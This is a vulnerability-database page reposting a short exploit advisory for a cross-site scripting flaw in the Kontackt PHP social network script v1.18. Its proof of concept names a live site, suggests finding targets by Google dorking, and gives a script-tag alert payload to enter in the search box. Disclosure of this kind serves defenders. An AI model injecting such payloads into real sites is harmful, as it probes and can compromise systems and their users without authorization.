Discussion on Kontackt - The Exclusive PHP Social Network Platform (v1.18) XSS Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1464800 漏洞类型
发布时间 2019-01-31 更新时间 2019-01-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019010298
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
====================================================================================================================================
| # Title     : Discussion on Kontackt - The Exclusive PHP Social Network Platform (v1.18) XSS Vulnerability                       |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | 
| # Vendor    : https://codecanyon.net/item/social-plus-ultimate-social-network-platform/21391853                                  |  
| # Dork      : n/a                                                                                                                |
====================================================================================================================================


poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Register new user https://www.speakrepublic.com/ .

[+] use payload in search box : <script>alert(/indoushka/);</script>


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh   |        
                                                                                                                                      |
=======================================================================================================================================